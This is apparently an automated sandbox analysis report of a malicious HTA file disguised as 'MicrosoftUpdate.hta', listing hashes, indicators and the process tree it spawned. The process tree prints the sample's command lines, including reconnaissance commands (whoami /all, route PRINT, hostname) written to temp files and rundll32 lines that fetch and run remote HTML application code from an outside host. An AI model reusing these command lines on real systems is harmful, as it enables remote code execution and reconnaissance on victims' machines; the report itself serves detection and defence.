8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869

General

Target

MicrosoftUpdate.hta
Size

26KB
MD5

12cd7a34e347311c7f07b5b10adb1266
SHA1

fc35180c4e3f0e95e02b163ddbd79ce4151e3ee4
SHA256

8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869
SHA512

31e4558f4fa8e9adc1e288b025ad3085f89abf3a89bb6a3857cea773c25cd97efb01cb5e814dc6f91766042f7ce1f007e621b84f09500d3672d5828a584c0e38

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 8 IoCs

Processes:

mshta.exerundll32.exerundll32.exerundll32.exe

flow	pid	process
11	860	mshta.exe
12	1520	rundll32.exe
13	1520	rundll32.exe
14	1688	rundll32.exe
15	1688	rundll32.exe
16	3212	rundll32.exe
17	1688	rundll32.exe
18	3212	rundll32.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

whoami.exewhoami.exe

description	pid	process
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	3128	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe
Token: SeDebugPrivilege	2732	whoami.exe

Suspicious use of WriteProcessMemory 66 IoCs

Processes:

mshta.execmd.execmd.execmd.exerundll32.execmd.execmd.execmd.exerundll32.exerundll32.execmd.exe

description	pid	process	target process
PID 860 wrote to memory of 2920	860	mshta.exe	cmd.exe
PID 860 wrote to memory of 2920	860	mshta.exe	cmd.exe
PID 860 wrote to memory of 2920	860	mshta.exe	cmd.exe
PID 2920 wrote to memory of 2928	2920	cmd.exe	chcp.com
PID 2920 wrote to memory of 2928	2920	cmd.exe	chcp.com
PID 2920 wrote to memory of 2928	2920	cmd.exe	chcp.com
PID 2920 wrote to memory of 3128	2920	cmd.exe	whoami.exe
PID 2920 wrote to memory of 3128	2920	cmd.exe	whoami.exe
PID 2920 wrote to memory of 3128	2920	cmd.exe	whoami.exe
PID 860 wrote to memory of 192	860	mshta.exe	cmd.exe
PID 860 wrote to memory of 192	860	mshta.exe	cmd.exe
PID 860 wrote to memory of 192	860	mshta.exe	cmd.exe
PID 192 wrote to memory of 940	192	cmd.exe	chcp.com
PID 192 wrote to memory of 940	192	cmd.exe	chcp.com
PID 192 wrote to memory of 940	192	cmd.exe	chcp.com
PID 860 wrote to memory of 516	860	mshta.exe	cmd.exe
PID 860 wrote to memory of 516	860	mshta.exe	cmd.exe
PID 860 wrote to memory of 516	860	mshta.exe	cmd.exe
PID 516 wrote to memory of 2716	516	cmd.exe	chcp.com
PID 516 wrote to memory of 2716	516	cmd.exe	chcp.com
PID 516 wrote to memory of 2716	516	cmd.exe	chcp.com
PID 516 wrote to memory of 3488	516	cmd.exe	ROUTE.EXE
PID 516 wrote to memory of 3488	516	cmd.exe	ROUTE.EXE
PID 516 wrote to memory of 3488	516	cmd.exe	ROUTE.EXE
PID 860 wrote to memory of 1520	860	mshta.exe	rundll32.exe
PID 860 wrote to memory of 1520	860	mshta.exe	rundll32.exe
PID 860 wrote to memory of 1520	860	mshta.exe	rundll32.exe
PID 1520 wrote to memory of 2344	1520	rundll32.exe	cmd.exe
PID 1520 wrote to memory of 2344	1520	rundll32.exe	cmd.exe
PID 1520 wrote to memory of 2344	1520	rundll32.exe	cmd.exe
PID 2344 wrote to memory of 3164	2344	cmd.exe	chcp.com
PID 2344 wrote to memory of 3164	2344	cmd.exe	chcp.com
PID 2344 wrote to memory of 3164	2344	cmd.exe	chcp.com
PID 2344 wrote to memory of 2732	2344	cmd.exe	whoami.exe
PID 2344 wrote to memory of 2732	2344	cmd.exe	whoami.exe
PID 2344 wrote to memory of 2732	2344	cmd.exe	whoami.exe
PID 1520 wrote to memory of 2924	1520	rundll32.exe	cmd.exe
PID 1520 wrote to memory of 2924	1520	rundll32.exe	cmd.exe
PID 1520 wrote to memory of 2924	1520	rundll32.exe	cmd.exe
PID 2924 wrote to memory of 2984	2924	cmd.exe	chcp.com
PID 2924 wrote to memory of 2984	2924	cmd.exe	chcp.com
PID 2924 wrote to memory of 2984	2924	cmd.exe	chcp.com
PID 1520 wrote to memory of 1956	1520	rundll32.exe	cmd.exe
PID 1520 wrote to memory of 1956	1520	rundll32.exe	cmd.exe
PID 1520 wrote to memory of 1956	1520	rundll32.exe	cmd.exe
PID 1956 wrote to memory of 4060	1956	cmd.exe	chcp.com
PID 1956 wrote to memory of 4060	1956	cmd.exe	chcp.com
PID 1956 wrote to memory of 4060	1956	cmd.exe	chcp.com
PID 1956 wrote to memory of 4024	1956	cmd.exe	ROUTE.EXE
PID 1956 wrote to memory of 4024	1956	cmd.exe	ROUTE.EXE
PID 1956 wrote to memory of 4024	1956	cmd.exe	ROUTE.EXE
PID 1520 wrote to memory of 1688	1520	rundll32.exe	rundll32.exe
PID 1520 wrote to memory of 1688	1520	rundll32.exe	rundll32.exe
PID 1520 wrote to memory of 1688	1520	rundll32.exe	rundll32.exe
PID 1688 wrote to memory of 3212	1688	rundll32.exe	rundll32.exe
PID 1688 wrote to memory of 3212	1688	rundll32.exe	rundll32.exe
PID 1688 wrote to memory of 3212	1688	rundll32.exe	rundll32.exe
PID 3212 wrote to memory of 1300	3212	rundll32.exe	cmd.exe
PID 3212 wrote to memory of 1300	3212	rundll32.exe	cmd.exe
PID 3212 wrote to memory of 1300	3212	rundll32.exe	cmd.exe
PID 1300 wrote to memory of 3980	1300	cmd.exe	chcp.com
PID 1300 wrote to memory of 3980	1300	cmd.exe	chcp.com
PID 1300 wrote to memory of 3980	1300	cmd.exe	chcp.com
PID 1300 wrote to memory of 3024	1300	cmd.exe	HOSTNAME.EXE

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\MicrosoftUpdate.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\c7a5b0df-ef04-681d-1180-6fdcca6be03c.txt 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:2920

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:2928

C:\Windows\SysWOW64\whoami.exe
whoami /all
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\b6b608e3-2391-f49b-3c29-a4d7954fe3ae.txt 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:192

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\d288a720-c85b-704c-c585-91a8468b1814.txt 2>&1
2⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\SysWOW64\chcp.com
chcp 437
3⤵
PID:2716

C:\Windows\SysWOW64\ROUTE.EXE
route PRINT
3⤵
PID:3488

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?6MCQS7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;\..\..\..\./mshtml,RunHTMLApplication
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\2c3add2f-2e8e-d370-0e3a-b0a6a5c3059f.txt 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:2344

C:\Windows\SysWOW64\chcp.com
chcp 437
4⤵
PID:3164

C:\Windows\SysWOW64\whoami.exe
whoami /all
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\f0d757f2-0e27-08cc-c0f3-a48209db0fb7.txt 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\SysWOW64\chcp.com
chcp 437
4⤵
PID:2984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\6c152063-30f4-caf6-e3a5-0cfb42823082.txt 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\SysWOW64\chcp.com
chcp 437
4⤵
PID:4060

C:\Windows\SysWOW64\ROUTE.EXE
route PRINT
4⤵
PID:4024

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?CGP42PEMTT=0c1a7106eae44312bfbf9dd352c260c9;EM58TMEAYG=;\..\..\..\./mshtml,RunHTMLApplication
3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?CGP42PEMTT=0c1a7106eae44312bfbf9dd352c260c9;EM58TMEAYG=fc0ea65803ea476083c12cb4d33724aa;\..\..\..\./mshtml,RunHTMLApplication
4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & hostname 1> C:\Users\Admin\AppData\Local\Temp\2e35ab70-3725-8c91-cca7-9d6c714ad986.txt 2>&1
5⤵
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\chcp.com
chcp 437
6⤵
PID:3980

C:\Windows\SysWOW64\HOSTNAME.EXE
hostname
6⤵
PID:3024

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2c3add2f-2e8e-d370-0e3a-b0a6a5c3059f.txt
MD5
b01c5569842ec70942eb82fad388640b

SHA1
8e3800031c3f2b38f7875a17a1522e044f7563b8

SHA256
fc4bc75cba4b36e52a32e1c4155e70d24518504d1e60fee7cca7dd51b8d3928c

SHA512
4a7a56050e217b88e8dd410d21883a2e3b9406be6c0f6017d96923459ea8c8fa50b19ddc51564d9cb0141717b1e5b87c833246a6ebeff16a0d7ee767bf27ed08

Download Submit
C:\Users\Admin\AppData\Local\Temp\2e35ab70-3725-8c91-cca7-9d6c714ad986.txt
MD5
a869fd098c3b03cfc21f6c6d96f9f315

SHA1
89e60a93de393e1769338af53726d0973e725ff7

SHA256
15c90f0fcacb2eab1fde5b5c13fba9ad9c535127db418b4f47a64ec2d90c8e51

SHA512
a57e3a9fb1d7bbfe933dd64413331023930cfdbfa3cc9d763e402c1b357aeadba8fecad721d7bd2b8c529473d988170f827d0f57b51c53a37b980d3bcc51c154

Download Submit
C:\Users\Admin\AppData\Local\Temp\6c152063-30f4-caf6-e3a5-0cfb42823082.txt
MD5
b639a417d3b5ec42f1f7080f5ee1c696

SHA1
1577abacb53284ec0fa61965740114a3f96a0d30

SHA256
e9780403692b6d7c05c67e7ab85367ef1118d5f480187027c0bc4d7aa00f464b

SHA512
a3a8bfd2b835b4c53657d29f63132bcdf01f17e0c23da4f6155295aac24a757de4e557e007c1ae56571389e700838b76ea6c394e64b9efad75ab3641e611f4f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\b6b608e3-2391-f49b-3c29-a4d7954fe3ae.txt
MD5
f0d77ff34694f66fa41eab0f98efa362

SHA1
2ecc80e3560b66e79b6653b0652a9f05bee30d9b

SHA256
99bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d

SHA512
7e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea

Download Submit
C:\Users\Admin\AppData\Local\Temp\c7a5b0df-ef04-681d-1180-6fdcca6be03c.txt
MD5
b01c5569842ec70942eb82fad388640b

SHA1
8e3800031c3f2b38f7875a17a1522e044f7563b8

SHA256
fc4bc75cba4b36e52a32e1c4155e70d24518504d1e60fee7cca7dd51b8d3928c

SHA512
4a7a56050e217b88e8dd410d21883a2e3b9406be6c0f6017d96923459ea8c8fa50b19ddc51564d9cb0141717b1e5b87c833246a6ebeff16a0d7ee767bf27ed08

Download Submit
C:\Users\Admin\AppData\Local\Temp\d288a720-c85b-704c-c585-91a8468b1814.txt
MD5
b639a417d3b5ec42f1f7080f5ee1c696

SHA1
1577abacb53284ec0fa61965740114a3f96a0d30

SHA256
e9780403692b6d7c05c67e7ab85367ef1118d5f480187027c0bc4d7aa00f464b

SHA512
a3a8bfd2b835b4c53657d29f63132bcdf01f17e0c23da4f6155295aac24a757de4e557e007c1ae56571389e700838b76ea6c394e64b9efad75ab3641e611f4f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\f0d757f2-0e27-08cc-c0f3-a48209db0fb7.txt
MD5
f0d77ff34694f66fa41eab0f98efa362

SHA1
2ecc80e3560b66e79b6653b0652a9f05bee30d9b

SHA256
99bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d

SHA512
7e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea

Download Submit
memory/192-6-0x0000000000000000-mapping.dmp

Download
memory/516-9-0x0000000000000000-mapping.dmp

Download
memory/940-7-0x0000000000000000-mapping.dmp

Download
memory/1300-27-0x0000000000000000-mapping.dmp

Download
memory/1520-13-0x0000000000000000-mapping.dmp

Download
memory/1688-25-0x0000000000000000-mapping.dmp

Download
memory/1956-21-0x0000000000000000-mapping.dmp

Download
memory/2344-14-0x0000000000000000-mapping.dmp

Download
memory/2716-10-0x0000000000000000-mapping.dmp

Download
memory/2732-16-0x0000000000000000-mapping.dmp

Download
memory/2920-2-0x0000000000000000-mapping.dmp

Download
memory/2924-18-0x0000000000000000-mapping.dmp

Download
memory/2928-3-0x0000000000000000-mapping.dmp

Download
memory/2984-19-0x0000000000000000-mapping.dmp

Download
memory/3024-29-0x0000000000000000-mapping.dmp

Download
memory/3128-4-0x0000000000000000-mapping.dmp

Download
memory/3164-15-0x0000000000000000-mapping.dmp

Download
memory/3212-26-0x0000000000000000-mapping.dmp

Download
memory/3488-11-0x0000000000000000-mapping.dmp

Download
memory/3980-28-0x0000000000000000-mapping.dmp

Download
memory/4024-23-0x0000000000000000-mapping.dmp

Download
memory/4060-22-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads